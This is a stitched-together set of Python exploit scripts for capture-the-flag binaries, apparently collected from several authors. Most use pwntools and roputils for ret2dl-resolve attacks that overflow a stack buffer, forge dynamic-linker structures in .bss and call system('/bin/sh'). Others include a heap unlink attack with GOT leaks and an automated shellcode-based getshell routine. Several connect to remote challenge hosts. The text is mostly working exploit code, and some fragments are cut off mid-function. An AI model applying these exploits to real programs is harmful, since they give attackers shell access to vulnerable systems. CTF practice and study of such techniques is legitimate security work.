def pwn(ip=None,port=None): binary='babystack' io,libc,ru,rn,sl,sn=init(binary) context.arch = 'i386' context.log_level='debug' elf = ELF(binary) #p=cyclic(0x40) #sn(p) eip='laaa' offset = cyclic_find(eip) #cyclic_find('baaacaaa', n=8) info('offset',offset) #ret2elf leave_ret=0x8048455 bof=0x0804843b arg_addr=elf.bss() func_addr=arg_addr+20 p1='a'*offset+p32(elf.symbols['read'])+p32(bof)+p32(0)+p32(arg_addr)+p32(100) info('p1 len',len(p1)) assert len(p1)==0x40 sn(p1) # ret2dl # save data to bss rop = roputils.ROP(binary) buf = rop.string('/bin/sh') buf += rop.fill(20, buf) buf += rop.dl_resolve_data(func_addr, 'system') buf += rop.fill(100, buf) sn(buf) # call p2='a'*offset+ rop.dl_resolve_call(func_addr, arg_addr) sn(p2) io.interactive()
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2017-04-14 20:59:16 # @Author : WinterSun ([email protected]) # @Link : https://Winter3un.github.io/ import roputils from pwn import * context(log_level="debug") DEBUG = 1 target = "./babyuse" remote_ip = "202.112.51.247" port = 3456 rop = roputils.ROP(target) # bss = rop.section('.bss') # rop.got('puts') # msfvenom -p linux/x86/exec CMD=/bin/sh -f python -b '\x00\x0b\x0d\x0a' if DEBUG: p = process(target) # p = remote("127.0.0.1",54321) # gdb.attach(p,"b*main\nc") else: p = remote(remote_ip, port) def sl(data): p.sendline(data) def sd(data):
#!/usr/bin/env python #coding:utf-8 #import sys import roputils from pwn import * offset = 0x28 + 4 # buf -> ret_addr readplt = 0x08048390 # read_addr bss = 0x0804a020 # bss_addr vulFunc = 0x0804852D # main #p = process('./baby_pwn') p = remote("da61f2425ce71e72c1ef02104c3bfb69.kr-lab.com", "33865") rop = roputils.ROP('./baby_pwn') addr_bss = rop.section('.bss') # step1 : write sh & resolve struct to bss buf1 = 'A' * offset #44 buf1 += p32(readplt) + p32(vulFunc) + p32(0) + p32(addr_bss) + p32(100) p.send(buf1) buf2 = rop.string('/bin/sh') buf2 += rop.fill(20, buf2) buf2 += rop.dl_resolve_data(addr_bss + 20, 'system') #在bss段伪造Elf32_Rel 和 Elf32_Sym buf2 += rop.fill(100, buf2) p.send(buf2) buf3 = 'A' * 44 + rop.dl_resolve_call(addr_bss + 20, addr_bss) #劫持eip至plt[0],解析system
import sys import roputils from pwn import * #context.log_level = 'debug' offset = 44 readplt = 0x08048390 bss = 0x0804a068 vulFunc = 0x0804852d #p = process('./pwn') #p = remote('da61f2425ce71e72c1ef02104c3bfb69.kr-lab.com','33865') p = remote('39.106.224.151','60005') rop = roputils.ROP('./pwn') addr_bss = rop.section('.bss') # step1 : write sh & resolve struct to bss buf1 = 'A' * offset #44 buf1 += p32(readplt) + p32(vulFunc) + p32(0) + p32(addr_bss) + p32(100) p.send(buf1) buf2 = rop.string('/bin/sh') buf2 += rop.fill(20, buf2) buf2 += rop.dl_resolve_data(addr_bss+20, 'system') buf2 += rop.fill(100, buf2) p.send(buf2) #gdb.attach(p) #step2 : use dl_resolve_call get system & system('/bin/sh') buf3 = 'A'*44 + rop.dl_resolve_call(addr_bss+20, addr_bss) p.send(buf3) p.interactive()
add(0, 512, "aaa") add(1, 512, "aaa") add(2, 512, "aaa") add(3, 512, "/bin/sh\x00") head = p64(0) + p64(1 + 512) fd = p64(0x6020C0 - 0x18) bk = p64(0x6020C0 - 0x10) payload = head + fd + bk payload += "a" * (512 - len(payload)) payload += p64(512) + p64(512 + 0x10) payload += "a" * (600 - len(payload)) edit(0, 600, payload) dele(1) rop = roputils.ROP("./pwn2") read_got = rop.got('read') free_got = rop.got('free') # free_got = 0x602018 edit_anyaddr(0x6020C0 + 0x20, p64(free_got)) show(4) free_addr = u64(ru("\n")[:-1].ljust(8, "\x00")) edit_anyaddr(0x6020C0 + 0x20, p64(read_got)) show(4) read_addr = u64(ru("\n")[:-1].ljust(8, "\x00")) print "free_addr=" + hex(free_addr) print "read_addr=" + hex(read_addr) offset = 0x83940 - 0x45390
HOST = "127.0.0.1" PORT = 1234 ELF_PATH = "/home/davis/PWN/bata_24/r0pbaby/r0pbaby" LIBC_PATH = "/home/davis/libc6_2.23-0ubuntu3_amd64.so" # setting context.arch = 'amd64' context.os = 'linux' context.endian = 'little' context.word_size = 32 context.log_level = 'INFO' elf = ELF(ELF_PATH) libc = ELF(LIBC_PATH) rop_libc = roputils.ROP(LIBC_PATH) def message(info, addr): print "[+] %s: [0x%x]" % (info, addr) def get_number(msg, start, end, base): return long(msg[start:end], base) if __name__ == "__main__": #r = remote(HOST, PORT) r = process(ELF_PATH)
#coding:utf-8 #import sys import roputils from pwn import * context.log_level = "debug" elf = ELF("./runtime_dlresolve_64") offset = 0x10 + 8 read_got = elf.plt["read"] vulFunc = 0x0000000000400566 pop_rdi_ret = 0x0000000000400603 pop_rsir15_ret = 0x0000000000400601 p = process('./runtime_dlresolve_64') rop = roputils.ROP('./runtime_dlresolve_64') addr_stage = rop.section('.bss') ptr_ret = rop.search(rop.section('.fini')) # step1 : write sh & resolve struct to bss buf = rop.fill(offset) buf += p64(pop_rdi_ret) + p64(0) + p64(pop_rsir15_ret) + p64(addr_stage) + p64( 0) + p64(read_got) + p64(vulFunc) p.send(buf) buf = "" buf += rop.dl_resolve_call(addr_stage + 210) buf += rop.fill(210, buf) buf += rop.dl_resolve_data(addr_stage + 210, 'system') buf += rop.fill(310, buf) buf += rop.string('/bin/sh') buf += rop.fill(350, buf)
from pwn import * import roputils context.log_level = 'debug' conn = remote('hackme.inndy.tw', 7706) elf = ELF('./rsbo-2') rop = roputils.ROP('./rsbo-2') offset = 108 bss_addr = elf.bss() base_stage = bss_addr + 0x800 pop_ebp = 0x0804879f leave_ret = 0x080484f8 pop3_ret = 0x0804879d main_addr = 0x0840867f read_plt = elf.plt['read'] read_80b = 0x0804865c payload = '\x00' * offset + p32(read_80b) + p32(pop_ebp) + p32( bss_addr + 0x400) + p32(leave_ret) conn.send(payload) payload = 'a' * 4 + p32(read_plt) + p32(pop3_ret) + p32(0) + p32( base_stage) + p32(100) payload += rop.dl_resolve_call(base_stage + 20, base_stage) payload += rop.fill(0x7f, payload) conn.sendline(payload)
import roputils from pwn import * elf=ELF('./babystack') sh=process('./babystack') offset=0x28+4 bss_addr=elf.bss() sub_addr=0x0804843B read_addr=elf.plt['read'] #create another read payload='A'*offset payload+=p32(read_addr)+p32(sub_addr)+p32(0)+p32(bss_addr)+p32(100) sh.send(payload) #create REL & SYM in bss rop=roputils.ROP('./babystack') payload=rop.string("/bin/sh\x00") payload+=rop.fill(20,payload) payload+=rop.dl_resolve_data(bss_addr+20,'system') payload+=rop.fill(100,payload) sh.send(payload) #rob eip to plt[0] payload='A'*offset+rop.dl_resolve_call(bss_addr+20,bss_addr) sh.send(payload) sh.interactive()
from pwn import * import roputils import sys context.arch = 'i386' rop=roputils.ROP('./starbound') host = 'chall.pwnable.tw' port = 10202 if len(sys.argv) > 1: r = remote(host, port) else: r = process('./starbound') def back(): r.sendlineafter('> ', '1') def setting(): r.sendlineafter('> ', '6') def set_name(payload): r.sendlineafter('> ', '2') r.sendlineafter(': ', payload) add_esp = 0x8048e48 puts_plt = 0x8048b90 read_plt = 0x8048a70 pop_ebp = 0x804a6df pop_3_times = 0x804a6dd linkmap_got = 0x8055004
# -*- coding: utf-8 -*- from pwn import * import sys sys.path.append("/home/tree/pwntools/roputils") import roputils import time #coding:utf-8 elf = ELF('./ret2dl32') offset = 0x2c read_plt = elf.plt['read'] bss = elf.bss vulFunc = 0x0804840b #the vunlfunc address p = process('./ret2dl32') rop = roputils.ROP('./ret2dl32') addr_bss = rop.section('.bss') #step 1 write sh & resolve struct to addr_bss payload = 'a' * 0x2c payload += p32(read_plt) + p32(vulFunc) + p32(0) + p32(addr_bss) + p32(0x100) p.send(payload) sleep(1) payload = rop.string("/bin/sh\x00") payload += rop.fill(20, payload) payload += rop.dl_resolve_data(addr_bss + 20, 'system') #func, name payload += rop.fill(100, payload) p.send(payload) sleep(1)
gdb.attach(p,cmd) # gadget pr = 0x080492d3 # pop ebp ; ret pppr = 0x080492d1 # pop esi ; pop edi ; pop ebp ; ret leave = 0x08049105 # leave ; ret # info read_plt = elf.symbols['read'] write_plt = elf.symbols['write'] stack_size = 0x800 bss_addr = elf.bss() base_stage = bss_addr + stack_size rop = roputils.ROP(local_file) # rop1 offset = 112 payload = 'A'*offset payload += p32(read_plt) + p32(pppr) + p32(0) + p32(base_stage) + p32(100) payload += p32(pr) + p32(base_stage+24) + p32(leave) pl = rop.fill(offset) pl += rop.call('read', 0, base_stage, 100) pl += rop.dl_resolve_call(base_stage+20, base_stage) ru('Welcome to XDCTF2015~!\n') # sl(payload) info_addr('base_stage', base_stage) debug()
#存储栈上的数据 fake_stack_esp = bss_start + 0x200 #放置栈的位置有些要求,因为bss上面就是不可写的text段,所以为了防止程序移动esp到text段,需要向下放 #太往下会导致padding过多,导致我用的socat提示broken pipe #Though this challenge is using https://github.com/giantbranch/pwn_deploy_chroot fake_stack_ebp = fake_stack_esp + 0x250 #存储解析符号的结果 fake_resolve_start = bss_start + 0x300 print "bss_start:", hex(bss_start) print "fake_stack_esp:", hex(fake_stack_esp) print "fake_stack_ebp:", hex(fake_stack_ebp) print "fake_resolve_start:", hex(fake_resolve_start) rop = roputils.ROP("../pwn01") #篡改栈指针,劫持栈: payload = "A" * (0x16 - 0x8) + p32(fake_stack_esp + 4) + "BBBB" + p32(fake_stack_ebp) #padding到fake栈的位置: payload += "S" * (0x200 - len(payload)) #让main函数执行完后调用read函数,将数据写到fake_resolve_start,其中解析符号用的数据的位置为fake_resolve_start + 50 payload += rop.call('read', 0, fake_resolve_start, 100) #执行完read函数后再去用刚写过去的解析符号用的数据来解析execve的位置 #并调用execve(fake_resolve_start+8, fake_resolve_start, 0) #即execve("/bin/sh", 指向参数数组的指针, 指向环境数组的指针) #这里参数无所谓,但必须要有,环境数组的指针为0. 具体为什么需要问出题人怎么魔改的/bin/sh文件 payload += rop.dl_resolve_call(fake_resolve_start + 50, fake_resolve_start + 8, fake_resolve_start, 0) #gdb.attach(session, '\n'.join(['b*0x080484ae', 'c', "b*0x08048519", "b*system"]))
#!/usr/bin/env python # -*- coding: utf-8 -*- __Auther__ = 'M4x' from pwn import * import roputils as rp context.log_level = "debug" io = process("./bof") offset = 112 rop = rp.ROP("./bof") bss = rop.section(".bss") payload = rop.fill(offset) payload += rop.call('read', 0, bss, 100) payload += rop.dl_resolve_call(bss + 20, bss) io.sendlineafter("!\n", payload) payload = rop.string("/bin/sh") payload += rop.fill(20, payload) payload += rop.dl_resolve_data(bss + 20, 'system') payload += rop.fill(100, payload) io.sendline(payload) io.interactive() io.close()
#!usr/bin/python # -*- coding: utf-8 -*- import roputils from pwn import * context(os='linux', log_level='debug') offset = 44 readplt = 0x08048300 bss = 0x0804a020 ret = 0x0804843B p = process('./stackba') rop = roputils.ROP('./stackba') addr_bss = rop.section('.bss') buf1 = 'A' * offset #44 buf1 += p32(readplt) + p32(ret) + p32(0) + p32(addr_bss) + p32(100) p.send(buf1) buf2 = rop.string('/bin/sh') buf2 += rop.fill(20, buf2) buf2 += rop.dl_resolve_data(addr_bss + 20, 'system') #在bss段伪造Elf32_Rel 和 Elf32_Sym buf2 += rop.fill(100, buf2) p.send(buf2) buf3 = 'A' * 44 + rop.dl_resolve_call(addr_bss + 20, addr_bss) #劫持eip至plt[0],解析system p.send(buf3) p.interactive()
def getshell(self, binary): global receive #try: if 1: fpath = binary core_list = filter(lambda x: "core" in x, os.listdir('.')) if len(core_list) is not 0: os.popen('ulimit -c unlimited') for core in core_list: os.unlink(core) p = process(binary) p.sendline(roputils.Pattern.create(2000)) sleep(0.5) p.close() ''' os.popen('ulimit -c unlimited') p = process(fpath) p.sendline(roputils.Pattern.create(2000)) ''' core_list = filter(lambda x: "core" in x, os.listdir('.')) core = core_list[0] p = roputils.Popen( ['gdb', fpath, core, '--batch', '-ex', 'x/wx $sp'], stdin=PIPE, stdout=PIPE) data = p.stdout.readlines() retaddr = data[len(data) - 1].split(':')[1].strip() index = roputils.Pattern.offset(retaddr) offset = int(index) r = roputils.ROP(fpath) target_elf = ELF(fpath) sc = roputils.Shellcode('i386') read_string = "\x65\x83\x3D\x0C\x00\x00\x00\x00\x75\x25\x53\x8B\x54\x24\x10\x8B\x4C\x24\x0C\x8B\x5C\x24\x08\xB8\x03\x00\x00\x00" read_offset = list(target_elf.search(read_string))[0] #print hex(read_offset) target_elf = ELF(fpath) buf_1 = r.retfill(offset) #print len(buf_1) addr_stage = r.section('.bss') #print 'addr_stage',hex(addr_stage) #print r.call(read_offset, 0, addr_stage, len(sc.exec_shell())),len(r.call(read_offset, 0, addr_stage, len(sc.exec_shell()))) buf_1 += r.call(read_offset, 0, addr_stage, len(sc.exec_shell())) buf_1 += r.call(addr_stage) buf_2 = sc.exec_shell() #print 'shellcode ready' #except: # return -1 #try: receive = str() for i in range(2): try: p = process(r.fpath) p.sendline(buf_1) #print 'quick_mode : buf_1 send' #print 'buf_1 : ',buf_1 #print len(buf_1) p.recvn(1) p.sendline(buf_2) #print 'quick_mode : buf_2 send' #print 'quick send' #try: p.sendline('echo zxcv;') receive = p.recvuntil('zxcv\n') p.close() #print 'i:' + str(i) + 'p.close' #try: #print 'receive:',receive except: if i == 0: p.close() pass #print 'i == 0,pass' else: p.close() #print 'i == 1,return -1' return -1 if 'zxcv' in receive: break if i == 0: buf_1 = 'a' + '\x00' + buf_1[2:] #print 'replace buf_1' #print len(buf_1) #p.close() #print 'return payload' return buf_1 + ',.,' + buf_2